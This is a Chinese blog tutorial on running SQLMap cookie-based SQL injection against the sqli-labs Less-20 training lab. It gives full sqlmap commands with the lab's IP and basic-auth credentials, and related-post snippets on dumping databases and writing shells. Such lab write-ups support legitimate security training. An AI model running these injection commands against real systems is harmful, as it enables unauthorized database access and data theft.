sqlmap使用_如何使用SQLMap进行cookie注入

最新推荐文章于 2024-05-14 20:32:45 发布
最新推荐文章于 2024-05-14 20:32:45 发布
阅读量1k 收藏 1
点赞数
文章标签: sqlmap使用 sqlmap命令

7cf556b0335700f42087621623ec6acf.png

1 f39d5af4ea54935f9dfcbdeafda2a8d0.png 1

登录目标地址,输入用户名和密码,用户名和密码都是admin

20dd46dcce9da92e92be0d6933073480.png

点击Submit

a78080bb776787df2dd122b18e83e005.png

开启代理服务 选择  HTTP代理:127.0.0.1,端口:8080

打开 burp

3a611aaf1a818e97bfc1dcfda2e41c17.png

通过抓包,我们知道登录的cookie是uname=admin

f39d5af4ea54935f9dfcbdeafda2a8d0.png 2

进行sqlmap的cookie注入攻击

windows 下命令为 

C:\Python27\sqlmap>sqlmap.py -u http://47.111.130.141:9002/sqli-labs/Less-20/ --cookie="uname=admin" --auth-type="Basic" --auth-cred="user2:pentest2" --batch --dbs --level=2

Linux 下命令为

sqlmap -u http://47.111.130.141:9002/sqli-labs/Less-20/ --cookie="uname=admin" --auth-type="Basic" --auth-cred="user2:pentest2" --batch --dbs --level=2

说明:  参数: --level=LEVEL

默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用 --level参数且数值>=2的时候会进行cookie注入测试;当>=3时,会进行User-Agent和Referer的注入测试。

结果画面为 

b4fcfc733085e763fde7e72d23960238.png

接下来可以爆表爆数据了。

想领取【200份简历模板】请加小唐老师微信 回复暗号:200

a99c7f4d82eb3c5a51bda7ef4a032ed7.png

4828055920dcd2c80ff30909b7f8aad3.png

f566ae70e7279fab5213e13295ce4e81.png

1908f21bad6558b2564c6f566775819b.png

10c53989c53d283b393198cc5ae3ba1b.png

495594dc062bf7b55f72e163160b778a.png

weixin_39837041
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手把手带你学习SQLMAP
2301_77147728的博客
03-22 719
表中的所有字段的内容,在这里可以清晰的看到user字段对应的password字段的值,这就是拖库的基本原理,学会了的给个赞。后面一系列的黑科技,由于权限不够,暂时就不分析了,下次有机会咱们再碰一碰。相反,这也说明了权限的重要性。可以看到这里咱们的Cookie是,security=medium表示咱们现在处于中级模式。美滋滋,成功了,抓包重放,屡试不爽,学会的给个赞~这里可以看到,咱们这个漏洞靶场使用的数据库是。选哪张表,你可以看当时自己的心情。可以看到这里咱们的Cookie是,数据库里面,我们获得到。
SQLMAP使用笔记.pdf
01-25
3. `--cookie`:cookie 注入 4. `--referer`:使用 referer 欺骗 5. `--user-agent`:自定义 user-agent 6. `--proxy`:代理注入 7. `--string`:指定关键词 8. `--threads`:采用多线程 9. `--sql-shell`:执行指定...
sqlmap之POST注入cookie注入
热门推荐
ve9etable的博客
10-28 2万+
零、POST注入 POST和GET POST和GET是HTTP的两种请求方法,并且是两种最常用的请求方法 GET一般指向指定资源请求数据,而POST则是要向指定资源提交需要被处理的数据 查询字符串是在 GET 请求的 URL 中发送的,类似于这样 而POST查询字符串是在 请求的 HTTP 消息主体中发送的,类似于这样 ...
网络安全最全SQLmap使用教程图文教程(超详细),2024年最新太厉害了
最新发布
2401_84264610的博客
05-14 1219
1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
SQL注入工具介绍——sqlmap
p36273的博客
08-01 1814
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆叠查询注入,可以同时执行多条语句的执行时的注入
sqlmap命令详解
Pitbull2014的博客
12-20 1121
cookie注入sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
注入SQLMAP(工具注入)
2301_79194110的博客
09-18 479
u get注入-r post注入-r --level cookies注入执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当>=3的时候将检查User-agent和Referer。-v 信息级别显示ERBOSE信息级别: 0-6 (缺省1),其值具体含义:“0”只显示python错误以及严重的信息;1同时显示基本信息和警告信息(默认);“2”同时显示debug信息;“3”同时显示注入的payload。
Sqlmap使用手册中文版
01-13
进行Web应用审计时,如果发现页面中的参数(如GET、POST或Cookie)可能受到用户输入的影响,Sqlmap可以帮助测试是否存在SQL注入漏洞。例如,通过对URL参数进行篡改,观察响应的变化,可以初步判断是否存在注入点。...
SQLMAP注入使用
05-13
SQLMAP注入使用 SQLMAP是一款强大的注入工具,相比经典的啊D和明小子之类的注入工具,SQLmap更加强大,无论是自带字典,功能还是界面优化,都是一款非常不错的注入工具。sqlmap可以多平台运行,windows,linux下...
第九节 Sqlmap注入位置介绍-01
09-15
Sqlmap 注入位置介绍 Sqlmap 是一个开源的 penetration testing工具,旨在检测和利用 SQL 注入漏洞。下面是关于Sqlmap 注入位置的详细介绍: 一、Sqlmap 注入介绍 Sqlmap 注入是指通过将恶意的 SQL 命令插入到 ...
SQLmap使用指令详解
06-12
SQLmap是一款网络安全检测工具 ...支持get,post ,cookie注入。可以添加cookie和user-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化算法,更高效。 指纹识别技术判断数据库
sqlmap专用将链接转换为Cookie注入用的代码
01-29
本工具为sqlmap专用,用于将普通注入链接转换为SQLmap里的Cookie注入链接,已经开源,代码和使用帮助全都在压缩包里 程序举例: 普通链接:http://www.xxx.com/TeachView.asp?id=21 转换为 sqlmap.py -u "http://www.xxx.com/TeachView.asp" --cookie"id=21"--level 2 主要用于省时省力 不至于每次复制到剪贴板
SQLMAP进阶使用 --cookie
Z_l123的博客
02-19 5396
实验原理 Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在 Web应用中至关重要,用户的唯一标识session id也是存在cookie 中的。利用SQLMAP对目标网站进行检测时,默认是不带cookie 的,在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上 cookie才能进行SQL注入检测。 1.访问DVWA网站 1)访问dvwa,并登录。admin password 2) 登录后,在左侧菜单点击“DVWA Security”,将DVWA
测试工具-sqlmap
weixin_42902126的博客
06-27 4267
sqlmap支持直连,通过以下命令来直连。 1、服务型数据库:mysql,oracle,sqlserver,postgresql等 服务型数据库(前提知道数据库用户名和密码): mysql数据库root账户默认不支持外链,参考文档:https://qa.1r1g.com/sf/ask/3435601921/ 2、文件型数据库:sqlite,access,firebird等 文件型数据库(前提知道数据库绝对路径): sqlmap获取目标 单一url探测 参数使用 -u 或 --url URL格式:http(s
注入工具使用-sqlmap
HacHunter的博客
03-24 4866
目录 利用sqlmap进行需要登录的注入 利用sqlmap进行POST注入 利用sqlmap进行文件读写 利用sqlmap辅助手工注入 利用sqlmap交互式写shell 利用sqlmap进行需要登录的注入 sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post ,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 打开 dvwa,输入用户
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
xnxqwzy的博客
09-06 1355
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
cookie中转注入使用sqlmap中转注入
椰树ii
04-29 7338
一,判断是否有cookie注入:目标网站http://www.xxx.com/x.asp?id=11.在IE浏览器访问去掉参数(id=1)的url: http://www.xxx.com/x.asp?(加载页面,显示不正常,原因是没有输参数)。2.在IE浏览器输入javascript:alert(document.cookie="id="+escape("1"));(添加cookie信息),再次访...
sqlmapcookie注入(靶场第二题)
giun的博客
03-03 7101
sqlmap 靶场第二题:https://hack.zkaq.org/?a=battle&f=target&id=31ac789a52edf9bb 首先我们尝试下sql注入 http://120.203.13.75:8001/shownews.asp?id=171%20and%201=1 说明该网站有防cookie注入 ...
Access注入——Cookie注入,偏移注入
weixin_46601374的博客
02-26 1212
Cookie注入简介 什么是CookieCookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号
sqlmap使用cookie
08-22
这样,sqlmap就可以利用cookie进行相关的SQL注入测试和攻击。通过设置cookie参数,sqlmap可以模拟用户的登录状态,进而检测和利用基于cookie验证的SQL注入漏洞。<span class="em">1</span><span class="em">2...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值